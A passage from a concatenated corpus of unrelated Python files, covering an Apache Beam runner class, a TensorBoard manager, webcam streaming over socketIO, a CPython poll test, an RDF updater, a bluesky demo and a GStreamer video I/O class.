@staticmethod
def _runner_api_state_to_pipeline_state(runner_api_state):
return getattr(
runner.PipelineState,
beam_job_api_pb2.JobState.Enum.Name(runner_api_state))
@staticmethod
def _pipeline_state_to_runner_api_state(pipeline_state):
return beam_job_api_pb2.JobState.Enum.Value(pipeline_state)
def metrics(self):
if not self._metrics:
job_metrics_response = self._job_service.GetJobMetrics(
beam_job_api_pb2.GetJobMetricsRequest(job_id=self._job_id))
self._metrics = PortableMetrics(job_metrics_response)
return self._metrics
def _last_error_message(self):
# type: () -> str
# Filter only messages with the "message_response" and error messages.
messages = [
m.message_response for m in self._messages
if m.HasField('message_response')
]
error_messages = [
m for m in messages
if m.importance == beam_job_api_pb2.JobMessage.JOB_MESSAGE_ERROR
]
if error_messages:
return error_messages[-1].message_text
else:
return 'unknown error'
def wait_until_finish(self, duration=None):
"""
:param duration: The maximum time in milliseconds to wait for the result of
the execution. If None or zero, will wait until the pipeline finishes.
:return: The result of the pipeline, i.e. PipelineResult.
"""
def read_messages():
# type: () -> None
previous_state = -1
for message in self._message_stream:
if message.HasField('message_response'):
logging.log(
MESSAGE_LOG_LEVELS[message.message_response.importance],
"%s",
message.message_response.message_text)
else:
current_state = message.state_response.state
if current_state != previous_state:
_LOGGER.info(
"Job state changed to %s",
self._runner_api_state_to_pipeline_state(current_state))
previous_state = current_state
self._messages.append(message)
message_thread = threading.Thread(
target=read_messages, name='wait_until_finish_read')
message_thread.daemon = True
message_thread.start()
if duration:
state_thread = threading.Thread(
target=functools.partial(self._observe_state, message_thread),
name='wait_until_finish_state_observer')
state_thread.daemon = True
state_thread.start()
start_time = time.time()
duration_secs = duration / 1000
while (time.time() - start_time < duration_secs and
state_thread.is_alive()):
time.sleep(1)
else:
self._observe_state(message_thread)
if self._runtime_exception:
raise self._runtime_exception
return self._state
def _observe_state(self, message_thread):
try:
for state_response in self._state_stream:
self._state = self._runner_api_state_to_pipeline_state(
state_response.state)
if state_response.state in TERMINAL_STATES:
# Wait for any last messages.
message_thread.join(10)
break
if self._state != runner.PipelineState.DONE:
self._runtime_exception = RuntimeError(
'Pipeline %s failed in state %s: %s' %
(self._job_id, self._state, self._last_error_message()))
except Exception as e:
self._runtime_exception = e
finally:
self._cleanup()
def _cleanup(self, on_exit=False):
# type: (bool) -> None
if on_exit and self._cleanup_callbacks:
_LOGGER.info(
'Running cleanup on exit. If your pipeline should continue running, '
'be sure to use the following syntax:\n'
' with Pipeline() as p:\n'
' p.apply(..)\n'
'This ensures that the pipeline finishes before this program exits.')
has_exception = None
for callback in self._cleanup_callbacks:
try:
callback()
except Exception:
has_exception = True
self._cleanup_callbacks = ()
if has_exception:
raise
|
tensorboard_manager.py
|
# -*- coding: utf-8 -*-
import os
import sys
import threading
import time
import itertools
from collections import namedtuple
import logging
sys.argv = ["tensorboard"]
from tensorboard.backend import application # noqa
try:
# Tensorboard 0.4.x series
from tensorboard import default
get_plugins = default.get_plugins
logging.debug("Tensorboard 0.4.x series detected")
except ImportError:
# Tensorboard 0.3.x series
from tensorboard.plugins.audio import audio_plugin
from tensorboard.plugins.core import core_plugin
from tensorboard.plugins.distribution import distributions_plugin
from tensorboard.plugins.graph import graphs_plugin
from tensorboard.plugins.histogram import histograms_plugin
from tensorboard.plugins.image import images_plugin
from tensorboard.plugins.profile import profile_plugin
from tensorboard.plugins.projector import projector_plugin
from tensorboard.plugins.scalar import scalars_plugin
from tensorboard.plugins.text import text_plugin
logging.debug("Tensorboard 0.3.x series detected")
def get_plugins():
return [
core_plugin.CorePlugin,
scalars_plugin.ScalarsPlugin,
images_plugin.ImagesPlugin,
audio_plugin.AudioPlugin,
graphs_plugin.GraphsPlugin,
distributions_plugin.DistributionsPlugin,
histograms_plugin.HistogramsPlugin,
projector_plugin.ProjectorPlugin,
text_plugin.TextPlugin,
profile_plugin.ProfilePlugin,
]
from .handlers import notebook_dir # noqa
TensorBoardInstance = namedtuple(
'TensorBoardInstance', ['name', 'logdir', 'tb_app', 'thread'])
def start_reloading_multiplexer(multiplexer, path_to_run, reload_interval):
def _ReloadForever():
current_thread = threading.currentThread()
while not current_thread.stop:
application.reload_multiplexer(multiplexer, path_to_run)
current_thread.reload_time = time.time()
time.sleep(reload_interval)
thread = threading.Thread(target=_ReloadForever)
thread.reload_time = None
thread.stop = False
thread.daemon = True
thread.start()
return thread
def TensorBoardWSGIApp(logdir, plugins, multiplexer,
reload_interval, path_prefix=""):
path_to_run = application.parse_event_files_spec(logdir)
if reload_interval:
thread = start_reloading_multiplexer(
multiplexer, path_to_run, reload_interval)
else:
application.reload_multiplexer(multiplexer, path_to_run)
thread = None
tb_app = application.TensorBoardWSGI(plugins)
manager.add_instance(logdir, tb_app, thread)
return tb_app
application.TensorBoardWSGIApp = TensorBoardWSGIApp
class TensorboardManger(dict):
def __init__(self):
self._logdir_dict = {}
def _next_available_name(self):
for n in itertools.count(start=1):
name = "%d" % n
if name not in self:
return name
def new_instance(self, logdir, reload_interval):
if not os.path.isabs(logdir) and notebook_dir:
logdir = os.path.join(notebook_dir, logdir)
if logdir not in self._logdir_dict:
purge_orphaned_data = True
plugins = get_plugins()
reload_interval = reload_interval or 30
application.standard_tensorboard_wsgi(
logdir=logdir, reload_interval=reload_interval,
purge_orphaned_data=purge_orphaned_data, plugins=plugins)
return self._logdir_dict[logdir]
def add_instance(self, logdir, tb_application, thread):
name = self._next_available_name()
instance = TensorBoardInstance(name, logdir, tb_application, thread)
self[name] = instance
self._logdir_dict[logdir] = instance
def terminate(self, name, force=True):
if name in self:
instance = self[name]
if instance.thread is not None:
instance.thread.stop = True
del self[name], self._logdir_dict[instance.logdir]
else:
raise Exception("There's no tensorboard instance named %s" % name)
manager = TensorboardManger()
|
camera.py
|
import cv2
import base64
from socketIO_client import SocketIO, BaseNamespace
import numpy as np
import time
from PIL import Image
from threading import Thread, ThreadError
import io
img_np = None
socketIO = SocketIO('http://192.168.0.102', 8020)
live_namespace = socketIO.define(BaseNamespace, '/live')
def receive_events_thread():
socketIO.wait()
def on_camera_response(*args):
global img_np
img_bytes = base64.b64decode(args[0]['data'])
img_np = np.array(Image.open(io.BytesIO(img_bytes)))
def run_cam():
global img_np
while True:
try:
cv2.imshow('cam',img_np)
if cv2.waitKey(30) & 0xFF == ord('q'):
break
except:
continue
live_namespace.on('camera_update', on_camera_response)
receive_events_thread = Thread(target=receive_events_thread)
receive_cam_thread = Thread(target=run_cam)
receive_events_thread.daemon = True
receive_events_thread.start()
receive_cam_thread.daemon = True
receive_cam_thread.start()
cap = cv2.VideoCapture(0)
while True:
ret, img = cap.read()
img_b = cv2.imencode('.jpg', cv2.cvtColor(img, cv2.COLOR_BGR2RGB))[1].tobytes()
base64_bytes = base64.b64encode(img_b)
base64_string = base64_bytes.decode('utf-8')
live_namespace.emit('livevideo',{'data':base64_string})
time.sleep(0.05)
|
test_poll.py
|
# Test case for the os.poll() function
import os
import subprocess
import random
import select
import threading
import time
import unittest
from test.support import TESTFN, run_unittest, reap_threads, cpython_only
try:
select.poll
except AttributeError:
raise unittest.SkipTest("select.poll not defined")
def find_ready_matching(ready, flag):
match = []
for fd, mode in ready:
if mode & flag:
match.append(fd)
return match
class PollTests(unittest.TestCase):
def test_poll1(self):
# Basic functional test of poll object
# Create a bunch of pipe and test that poll works with them.
p = select.poll()
NUM_PIPES = 12
MSG = b" This is a test."
MSG_LEN = len(MSG)
readers = []
writers = []
r2w = {}
w2r = {}
for i in range(NUM_PIPES):
rd, wr = os.pipe()
p.register(rd)
p.modify(rd, select.POLLIN)
p.register(wr, select.POLLOUT)
readers.append(rd)
writers.append(wr)
r2w[rd] = wr
w2r[wr] = rd
bufs = []
while writers:
ready = p.poll()
ready_writers = find_ready_matching(ready, select.POLLOUT)
if not ready_writers:
raise RuntimeError("no pipes ready for writing")
wr = random.choice(ready_writers)
os.write(wr, MSG)
ready = p.poll()
ready_readers = find_ready_matching(ready, select.POLLIN)
if not ready_readers:
raise RuntimeError("no pipes ready for reading")
rd = random.choice(ready_readers)
buf = os.read(rd, MSG_LEN)
self.assertEqual(len(buf), MSG_LEN)
bufs.append(buf)
os.close(r2w[rd]) ; os.close( rd )
p.unregister( r2w[rd] )
p.unregister( rd )
writers.remove(r2w[rd])
self.assertEqual(bufs, [MSG] * NUM_PIPES)
def test_poll_unit_tests(self):
# returns NVAL for invalid file descriptor
FD, w = os.pipe()
os.close(FD)
os.close(w)
p = select.poll()
p.register(FD)
r = p.poll()
self.assertEqual(r[0], (FD, select.POLLNVAL))
with open(TESTFN, 'w') as f:
fd = f.fileno()
p = select.poll()
p.register(f)
r = p.poll()
self.assertEqual(r[0][0], fd)
r = p.poll()
self.assertEqual(r[0], (fd, select.POLLNVAL))
os.unlink(TESTFN)
# type error for invalid arguments
p = select.poll()
self.assertRaises(TypeError, p.register, p)
self.assertRaises(TypeError, p.unregister, p)
# can't unregister non-existent object
p = select.poll()
self.assertRaises(KeyError, p.unregister, 3)
# Test error cases
pollster = select.poll()
class Nope:
pass
class Almost:
def fileno(self):
return 'fileno'
self.assertRaises(TypeError, pollster.register, Nope(), 0)
self.assertRaises(TypeError, pollster.register, Almost(), 0)
# Another test case for poll(). This is copied from the test case for
# select(), modified to use poll() instead.
def test_poll2(self):
cmd = 'for i in 0 1 2 3 4 5 6 7 8 9; do echo testing...; sleep 1; done'
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,
bufsize=0)
proc.__enter__()
self.addCleanup(proc.__exit__, None, None, None)
p = proc.stdout
pollster = select.poll()
pollster.register( p, select.POLLIN )
for tout in (0, 1000, 2000, 4000, 8000, 16000) + (-1,)*10:
fdlist = pollster.poll(tout)
if (fdlist == []):
continue
fd, flags = fdlist[0]
if flags & select.POLLHUP:
line = p.readline()
if line != b"":
self.fail('error: pipe seems to be closed, but still returns data')
continue
elif flags & select.POLLIN:
line = p.readline()
if not line:
break
self.assertEqual(line, b'testing...\n')
continue
else:
self.fail('Unexpected return value from select.poll: %s' % fdlist)
def test_poll3(self):
# test int overflow
pollster = select.poll()
pollster.register(1)
self.assertRaises(OverflowError, pollster.poll, 1 << 64)
x = 2 + 3
if x != 5:
self.fail('Overflow must have occurred')
# Issues #15989, #17919
self.assertRaises(ValueError, pollster.register, 0, -1)
self.assertRaises(OverflowError, pollster.register, 0, 1 << 64)
self.assertRaises(ValueError, pollster.modify, 1, -1)
self.assertRaises(OverflowError, pollster.modify, 1, 1 << 64)
@cpython_only
def test_poll_c_limits(self):
from _testcapi import USHRT_MAX, INT_MAX, UINT_MAX
pollster = select.poll()
pollster.register(1)
# Issues #15989, #17919
self.assertRaises(OverflowError, pollster.register, 0, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.modify, 1, USHRT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, INT_MAX + 1)
self.assertRaises(OverflowError, pollster.poll, UINT_MAX + 1)
@reap_threads
def test_threaded_poll(self):
r, w = os.pipe()
self.addCleanup(os.close, r)
self.addCleanup(os.close, w)
rfds = []
for i in range(10):
fd = os.dup(r)
self.addCleanup(os.close, fd)
rfds.append(fd)
pollster = select.poll()
for fd in rfds:
pollster.register(fd, select.POLLIN)
t = threading.Thread(target=pollster.poll)
t.start()
try:
time.sleep(0.5)
# trigger ufds array reallocation
for fd in rfds:
pollster.unregister(fd)
pollster.register(w, select.POLLOUT)
self.assertRaises(RuntimeError, pollster.poll)
finally:
# and make the call to poll() from the thread return
os.write(w, b'spam')
t.join()
@unittest.skipUnless(threading, 'Threading required for this test.')
@reap_threads
def test_poll_blocks_with_negative_ms(self):
for timeout_ms in [None, -1000, -1, -1.0, -0.1, -1e-100]:
# Create two file descriptors. This will be used to unlock
# the blocking call to poll.poll inside the thread
r, w = os.pipe()
pollster = select.poll()
pollster.register(r, select.POLLIN)
poll_thread = threading.Thread(target=pollster.poll, args=(timeout_ms,))
poll_thread.start()
poll_thread.join(timeout=0.1)
self.assertTrue(poll_thread.is_alive())
# Write to the pipe so pollster.poll unblocks and the thread ends.
os.write(w, b'spam')
poll_thread.join()
self.assertFalse(poll_thread.is_alive())
os.close(r)
os.close(w)
def test_main():
run_unittest(PollTests)
if __name__ == '__main__':
test_main()
|
updateOWLfilesFromOutputs.py
|
import shutil
from multiprocessing import Process
import time
import rdflib
def prepareDataToUpdate():
taskList = []
with open('outputBusOPF.txt') as fileNow:
linesNow = fileNow.readlines()
for line in linesNow:
splittedLine = line.split('\t')
index = str('{0:03}'.format(int(splittedLine[0])))
busOutputMap = ['index',('V_PuVout_EBus-%s'%index),('V_thetaout_EBus-%s'%index),('V_Pout_EBus-%s'%index),('V_Qout_EBus-%s'%index)]
filename = '../' + ('EBus-%s'%index) + '.owl'
print('filename',filename)
attrPairForALine = []
for i in range(1,len(busOutputMap)):
IRI = filename + '#' + busOutputMap[i]
value = splittedLine[i] + ' (updated)'
attrPair = {'IRI': IRI, 'value': value}
attrPairForALine.append(attrPair)
taskList.append({'fileName': filename,'aLine': attrPairForALine})
# with open('outputBranchOPF.txt') as fileNow:
# linesNow = fileNow.readlines()
# for line in linesNow:
# splittedLine = line.split('\t')
# index = str('{0:03}'.format(int(splittedLine[0])))
# print('index -- ',index );
#stop = input('yo')
# branchOutputMap = ['index',('V_Ploss_MGDL-%s'%index),('V_Qloss_MGDL-%s'%index)]
# filename = ('MGDL-%s'%index) + '.owl'
# print('filename',filename)
# attrPairForALine = []
# for i in range(1,len(branchOutputMap)):
# IRI = filename + '#' + branchOutputMap[i]
# value = splittedLine[i] + ' (updated)'
# attrPair = {'IRI': IRI, 'value': value}
# attrPairForALine.append(attrPair)
# taskList.append({'fileName': filename,'aLine': attrPairForALine})
return taskList
def updateToFile(filename,attrPairForALine):
print('filename',filename)
print('attrPairForALine',attrPairForALine)
updates = []
for attrPair in attrPairForALine:
targetIRI = attrPair['IRI']
value = attrPair['value']
deleteString = """PREFIX system: <http://www.theworldavatar.com/OntoCAPE/OntoCAPE/upper_level/system.owl#> DELETE WHERE { <http://www.theworldavatar.com/""" + targetIRI + """> system:numericalValue ?o .}"""
insertString = """PREFIX system: <http://www.theworldavatar.com/OntoCAPE/OntoCAPE/upper_level/system.owl#> INSERT DATA { <http://www.theworldavatar.com/""" + targetIRI + """> system:numericalValue '""" + value + """' .}"""
updates.append(deleteString)
updates.append(insertString)
localfilename = filename
g = rdflib.Graph()
g.load(localfilename)
for update in updates:
g.update(update)
g.serialize(destination='%s' %localfilename,format='pretty-xml')
print(filename)
if __name__ == "__main__": # confirms that the code is under main function
taskArray = prepareDataToUpdate()
procs = []
proc = Process(target=updateToFile) # instantiating without any argument
procs.append(proc)
proc.start()
for task in taskArray:
proc = Process(target=updateToFile, args=(task['fileName'],task['aLine'],))
procs.append(proc)
proc.start()
for proc in procs:
proc.join()
|
demo.py
|
import logging
from multiprocessing import Process, Queue
from pathlib import Path
from suitcase.jsonl import Serializer
from bluesky import RunEngine
from ophyd.sim import det, det4, noisy_det, motor, motor1, motor2, img
from bluesky.plans import scan, count, grid_scan
from bluesky.preprocessors import SupplementalData
from event_model import RunRouter
import intake_bluesky.jsonl # noqa; to force intake registration
from ophyd.sim import SynSignal
import numpy as np
det.kind = 'hinted'
noisy_det.kind = 'hinted'
det4.kind = 'hinted'
log = logging.getLogger('bluesky_browser')
random_img = SynSignal(func=lambda: np.random.random((5, 10, 10)), name='random_img')
def generate_example_catalog(data_path):
data_path = Path(data_path)
def factory(name, doc):
serializer = Serializer(data_path / 'abc')
serializer('start', doc)
return [serializer], []
RE = RunEngine()
sd = SupplementalData()
RE.preprocessors.append(sd)
sd.baseline.extend([motor1, motor2])
rr = RunRouter([factory])
RE.subscribe(rr)
RE(count([det]))
RE(count([noisy_det], 5))
RE(scan([det], motor, -1, 1, 7))
RE(grid_scan([det4], motor1, -1, 1, 4, motor2, -1, 1, 7, False))
RE(scan([det], motor, -1, 1, motor2, -1, 1, 5))
RE(count([noisy_det, det], 5))
RE(count([random_img], 5))
RE(count([img], 5))
def factory(name, doc):
serializer = Serializer(data_path / 'xyz')
serializer('start', doc)
return [serializer], []
RE = RunEngine()
rr = RunRouter([factory])
RE.subscribe(rr)
RE(count([det], 3))
catalog_filepath = data_path / 'catalog.yml'
with open(catalog_filepath, 'w') as file:
file.write(f'''
plugins:
source:
- module: intake_bluesky
sources:
abc:
description: Some imaginary beamline
driver: intake_bluesky.jsonl.BlueskyJSONLCatalog
container: catalog
args:
paths: {Path(data_path) / 'abc' / '*.jsonl'}
handler_registry:
NPY_SEQ: ophyd.sim.NumpySeqHandler
metadata:
beamline: "00-ID"
xyz:
description: Some imaginary beamline
driver: intake_bluesky.jsonl.BlueskyJSONLCatalog
container: catalog
args:
paths: {Path(data_path) / 'xyz' / '*.jsonl'}
handler_registry:
NPY_SEQ: ophyd.sim.NumpySeqHandler
metadata:
beamline: "99-ID"
''')
return str(catalog_filepath)
def run_proxy(queue):
"""
Run Proxy on random, free ports and communicate the port numbers back.
"""
from bluesky.callbacks.zmq import Proxy
proxy = Proxy()
queue.put((proxy.in_port, proxy.out_port))
proxy.start()
def run_publisher(in_port, data_path):
"""
Acquire data in an infinite loop and publish it.
"""
import asyncio
from bluesky.callbacks.zmq import Publisher
from suitcase.jsonl import Serializer
from ophyd.sim import noisy_det, motor1, motor2
from bluesky.plans import count
from bluesky.preprocessors import SupplementalData
from bluesky.plan_stubs import sleep
publisher = Publisher(f'localhost:{in_port}')
RE = RunEngine(loop=asyncio.new_event_loop())
sd = SupplementalData()
RE.preprocessors.append(sd)
sd.baseline.extend([motor1, motor2])
RE.subscribe(publisher)
def factory(name, doc):
serializer = Serializer(data_path / 'abc')
serializer('start', doc)
return [serializer], []
rr = RunRouter([factory])
RE.subscribe(rr)
def infinite_plan():
while True:
yield from sleep(3)
yield from count([noisy_det], 20, delay=0.5)
yield from count([random_img], 10, delay=1)
try:
RE(infinite_plan())
finally:
RE.halt()
def stream_example_data(data_path):
data_path = Path(data_path)
log.debug(f"Serializing example data into directory {data_path!s}")
queue = Queue()
proxy_process = Process(target=run_proxy, args=(queue,))
proxy_process.start()
in_port, out_port = queue.get()
log.debug(f"Demo Proxy is listening on port {in_port} and publishing to {out_port}.")
publisher_process = Process(target=run_publisher, args=(in_port, data_path))
publisher_process.start()
log.debug("Demo acquisition has started.")
return f'localhost:{out_port}', proxy_process, publisher_process
|
test_proxy.py
|
import threading
import websocket
import json
import time
def on_open(ws):
print("opened")
auth_data = {
"action": "authenticate",
"data": {"key_id": "INSERT_KEY", "secret_key": "INSERT_KEY"}
}
ws.send(json.dumps(auth_data))
listen_message = {"action": "listen", "data": {"streams": ["T.TSLA"]}}
ws.send(json.dumps(listen_message))
def on_message(ws, message):
print("WS 1: received a message")
print(message)
print()
def on_message2(ws, message):
print("WS 2: received a message")
print(message)
print()
def on_close(ws):
print("closed connection")
socket = "ws://127.0.0.1:8765"
# ws = websocket.WebSocketApp(socket, on_open=on_open,
# on_message=on_message, on_close=on_close)
ws = websocket.WebSocketApp(socket,
on_message=lambda ws, msg: on_message(ws,
msg),
on_close=lambda ws: on_close(ws),
on_open=lambda ws: on_open(ws))
ws2 = websocket.WebSocketApp(socket,
on_message=lambda ws, msg: on_message2(ws,
msg),
on_close=lambda ws: on_close(ws),
on_open=lambda ws: on_open(ws))
t1 = threading.Thread(target=ws.run_forever, args=())
t2 = threading.Thread(target=ws2.run_forever, args=())
t1.start()
t2.start()
time.sleep(10)
t1.kill()
t2.kill()
print("joined")
|
videoio.py
|
from pathlib import Path
from enum import Enum
from collections import deque
from urllib.parse import urlparse
import subprocess
import threading
import logging
import cv2
logger = logging.getLogger(__name__)
# set up logging
LOG_PATH_GSTREAMER_CAPTURE = 'site/gstreamer_capture.log'
LOG_PATH_GSTREAMER_WRITE = 'site/gstreamer_write.log'
WITH_GSTREAMER = True
# https://docs.python.org/3/library/contextlib.html#contextlib.redirect_stdout
# Will try to redirect cv2 output to logger.
import os, contextlib
class Protocol(Enum):
IMAGE = 0
VIDEO = 1
CSI = 2
V4L2 = 3
RTSP = 4
HTTP = 5
RTMP = 6
MQTT = 7
WS = 8
class VideoIO:
def __init__(self, size, input_uri,
output_uri=None,
resolution=(1920, 1080),
frame_rate=30,
buffer_size=10,
proc_fps=30):
"""Class for video capturing and output saving.
Encoding, decoding, and scaling can be accelerated using the GStreamer backend.
Parameters
----------
size : tuple
Width and height of each frame to output.
input_uri : str
URI to input stream. It could be image sequence (e.g. '%06d.jpg'), video file (e.g. 'file.mp4'),
MIPI CSI camera (e.g. 'csi://0'), USB/V4L2 camera (e.g. '/dev/video0'),
RTSP stream (e.g. 'rtsp://<user>:<password>@<ip>:<port>/<path>'),
or HTTP live stream (e.g. 'http://<user>:<password>@<ip>:<port>/<path>')
output_uri : str, optionals
URI to an output video file.
resolution : tuple, optional
Original resolution of the input source.
Useful to set a certain capture mode of a USB/CSI camera.
frame_rate : int, optional
Frame rate of the input source.
Required if frame rate cannot be deduced, e.g. image sequence and/or RTSP.
Useful to set a certain capture mode of a USB/CSI camera.
buffer_size : int, optional
Number of frames to buffer.
For live sources, a larger buffer drops less frames but increases latency.
proc_fps : int, optional
Estimated processing speed that may limit the capture interval `cap_dt`.
This depends on hardware and processing complexity.
"""
self.size = size
self.input_uri = input_uri
self.output_uri = output_uri
self.resolution = resolution
assert frame_rate > 0
self.frame_rate = frame_rate
assert buffer_size >= 1
self.buffer_size = buffer_size
assert proc_fps > 0
self.proc_fps = proc_fps
self.input_protocol = self._parse_uri(self.input_uri)
self.output_protocol = self._parse_uri(self.output_uri)
self.input_is_live = self.input_protocol != Protocol.IMAGE and self.input_protocol != Protocol.VIDEO
self.output_is_live = self.output_protocol != Protocol.IMAGE and self.output_protocol != Protocol.VIDEO
# TODO: https://blog.csdn.net/weixin_41099962/article/details/103097384
# TODO: https://forums.developer.nvidia.com/t/opencv-video-writer-to-gstreamer-appsrc/115567/20
# TODO: https://docs.opencv.org/3.4/d8/dfe/classcv_1_1VideoCapture.html
logger.debug("cv2.VideoCapture(str, int)")
with open(LOG_PATH_GSTREAMER_CAPTURE, 'a') as f:
with contextlib.redirect_stdout(f):
with contextlib.redirect_stderr(f):
if WITH_GSTREAMER:
self.source = cv2.VideoCapture(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
else:
self.source = cv2.VideoCapture(self.input_uri)
logger.debug("deque()")
self.frame_queue = deque([], maxlen=self.buffer_size)
self.cond = threading.Condition()
self.exit_event = threading.Event()
self.cap_thread = threading.Thread(target=self._capture_frames)
logger.debug("source.read()")
ret, frame = self.source.read()
if not ret:
raise RuntimeError('Unable to read video stream')
self.frame_queue.append(frame)
width = self.source.get(cv2.CAP_PROP_FRAME_WIDTH)
height = self.source.get(cv2.CAP_PROP_FRAME_HEIGHT)
self.cap_fps = self.source.get(cv2.CAP_PROP_FPS)
self.do_resize = (width, height) != self.size
if self.cap_fps == 0:
self.cap_fps = self.frame_rate # fallback to config if unknown
logger.info('%dx%d stream @ %d FPS', width, height, self.cap_fps)
if self.output_uri is not None:
#TODO: How to determine as file path?
if (self.output_protocol == Protocol.VIDEO):
Path(self.output_uri).parent.mkdir(parents=True, exist_ok=True)
output_fps = 1 / self.cap_dt
with open(LOG_PATH_GSTREAMER_WRITE, 'a') as f:
with contextlib.redirect_stdout(f):
with contextlib.redirect_stderr(f):
if WITH_GSTREAMER:
logger.debug("cv2.VideoWriter(): output_fps = %f", output_fps)
self.writer = cv2.VideoWriter(self._gst_write_pipeline(), cv2.CAP_GSTREAMER, 0,
output_fps, self.size, True)
else:
logger.debug("cv2.VideoWriter(): fourcc")
fourcc = cv2.VideoWriter_fourcc(*'avc1')
self.writer = cv2.VideoWriter(self.output_uri, fourcc, output_fps, self.size, True)
@property
def cap_dt(self):
# limit capture interval at processing latency for live sources
return 1 / min(self.cap_fps, self.proc_fps) if self.input_is_live else 1 / self.cap_fps
def start_capture(self):
logger.debug("start_capture()")
"""Start capturing from file or device."""
if not self.source.isOpened():
self.source.open(self._gst_cap_pipeline(), cv2.CAP_GSTREAMER)
if not self.cap_thread.is_alive():
self.cap_thread.start()
def stop_capture(self):
logger.debug("stop_capture()")
"""Stop capturing from file or device."""
with self.cond:
self.exit_event.set()
self.cond.notify()
self.frame_queue.clear()
self.cap_thread.join()
def read(self):
logger.debug("read()")
"""Reads the next video frame.
Returns
-------
ndarray
Returns None if there are no more frames.
"""
with self.cond:
while len(self.frame_queue) == 0 and not self.exit_event.is_set():
self.cond.wait()
if len(self.frame_queue) == 0 and self.exit_event.is_set():
return None
frame = self.frame_queue.popleft()
self.cond.notify()
if self.do_resize:
logger.debug("cv2.resize: %s", self.size)
frame = cv2.resize(frame, self.size)
return frame
def write(self, frame):
logger.debug("write()")
"""Writes the next video frame."""
assert hasattr(self, 'writer')
self.writer.write(frame)
def release(self):
logger.debug("release()")
"""Cleans up input and output sources."""
self.stop_capture()
if hasattr(self, 'writer'):
self.writer.release()
self.source.release()
def _gst_cap_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
if 'nvvidconv' in gst_elements and self.input_protocol != Protocol.V4L2:
# format conversion for hardware decoder
# Note: detector accepts BGR only.
cvt_pipeline = (
'nvvidconv interpolation-method=5 ! videoconvert ! videorate ! '
'video/x-raw, width=%d, height=%d, framerate=%d/1, format=BGR ! ' #I420 / BGRx #Limited to 3 FPS for AI
'appsink sync=false' # sync=false
% (*self.size, self.frame_rate)
)
else:
cvt_pipeline = (
'videoscale ! '
'video/x-raw, width=%d, height=%d ! '
'videoconvert ! appsink sync=false'
% self.size
)
if self.input_protocol == Protocol.IMAGE:
pipeline = (
'multifilesrc location=%s index=1 caps="image/%s,framerate=%d/1" ! decodebin ! '
% (
self.input_uri,
self._img_format(self.input_uri),
self.frame_rate
)
)
elif self.input_protocol == Protocol.VIDEO:
pipeline = 'filesrc location=%s ! decodebin ! ' % self.input_uri
elif self.input_protocol == Protocol.CSI:
if 'nvarguscamerasrc' in gst_elements:
pipeline = (
'nvarguscamerasrc sensor_id=%s ! '
'video/x-raw(memory:NVMM), width=%d, height=%d, '
'format=NV12, framerate=%d/1 ! '
% (
self.input_uri[6:],
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer CSI plugin not found')
elif self.input_protocol == Protocol.V4L2:
if 'v4l2src' in gst_elements:
pipeline = (
'v4l2src device=%s ! '
'video/x-raw, width=%d, height=%d, '
'format=YUY2, framerate=%d/1 ! '
% (
self.input_uri,
*self.resolution,
self.frame_rate
)
)
else:
raise RuntimeError('GStreamer V4L2 plugin not found')
elif self.input_protocol == Protocol.RTSP:
pipeline = (
'rtspsrc location=%s latency=0 ! '
'capsfilter caps=application/x-rtp,media=video ! decodebin ! ' % self.input_uri
)
elif self.input_protocol == Protocol.HTTP:
#HLS need dedicated plugin.
#https://stackoverflow.com/questions/31952067/is-there-a-way-of-detecting-the-end-of-an-hls-stream-with-javascript
#TODO: How about MPEG-DASH?
pipeline = 'souphttpsrc location=%s %s ! hlsdemux ! decodebin ! ' % (self.input_uri, 'is-live=true' if self.input_is_live else '')
logger.debug("GSTREAMER INPUT: %s", pipeline + cvt_pipeline)
return pipeline + cvt_pipeline
def _gst_write_pipeline(self):
gst_elements = str(subprocess.check_output('gst-inspect-1.0'))
video_codec = 'RGBA'
if self.output_protocol == Protocol.RTMP:
video_codec = 'I420'
else:
video_codec = 'RGBA'
# use hardware encoder if found
# Note: Our RTMP output accepts I420 only.
if 'nvv4l2h264enc' in gst_elements:
#nvcompositor !
#h264_encoder = 'appsrc ! nvvidconv ! nvv4l2h264enc ! h264parse'
h264_encoder = 'appsrc ! queue ! videoconvert ! video/x-raw,format=%s ! nvvidconv ! nvv4l2h264enc ! h264parse ! queue' % (video_codec) #autovideoconvert ! nvv4l2h264enc !
# OMX is depreceated in recent Jetson
elif 'omxh264enc' in gst_elements:
h264_encoder = 'appsrc ! autovideoconvert ! omxh264enc preset-level=2'
elif 'x264enc' in gst_elements:
h264_encoder = 'appsrc ! autovideoconvert ! x264enc pass=4'
else:
raise RuntimeError('GStreamer H.264 encoder not found')
#TODO: Same support as input stream? MQTT?
if self.output_protocol == Protocol.RTMP:
pipeline = (
'%s ! flvmux ! rtmpsink sync=false location="%s%s"' # sync=true async=true
% (
h264_encoder,
self.output_uri,
' live=true' if self.output_is_live else ''
)
)
elif self.output_protocol == Protocol.MQTT or self.output_protocol == Protocol.WS:
pipeline = (
#'%s ! fakesink sync=false' #name=sink
'%s ! flvmux ! rtmpsink sync=false location="rtmp://video.etag-hk.com/intern/ch1 live=true"'
% (
h264_encoder,
#self.output_uri, #Will be carried by MQTT module
#' live=true' if self.output_is_live else '' #Will be carried by MQTT module
)
)
else:
pipeline = (
'%s ! qtmux ! filesink location=%s '
% (
h264_encoder,
self.output_uri
)
)
#https://forums.developer.nvidia.com/t/python-opencv-rtmpsink-gstreamer-bug/112272
logger.debug("GSTREAMER OUTPUT: %s", pipeline)
return pipeline
def _capture_frames(self):
logger.debug("_capture_frames()")
while not self.exit_event.is_set():
ret, frame = self.source.read()
with self.cond:
if not ret:
self.exit_event.set()
self.cond.notify()
break
# keep unprocessed frames in the buffer for file
if not self.input_is_live:
while (len(self.frame_queue) == self.buffer_size and
not self.exit_event.is_set()):
self.cond.wait()
self.frame_queue.append(frame)
self.cond.notify()
@staticmethod
def _parse_uri(uri):
result = urlparse(uri)
if result.scheme == 'csi':
protocol = Protocol.CSI
elif result.scheme == 'rtsp':
protocol = Protocol.RTSP
elif result.scheme == 'rtmp':
protocol = Protocol.RTMP
elif (result.scheme == 'http' or result.scheme == 'https'):
protocol = Protocol.HTTP
elif result.scheme == 'mqtt':
protocol = Protocol.MQTT
elif (result.scheme == 'ws' or result.scheme == 'wss'):
protocol = Protocol.WS
else:
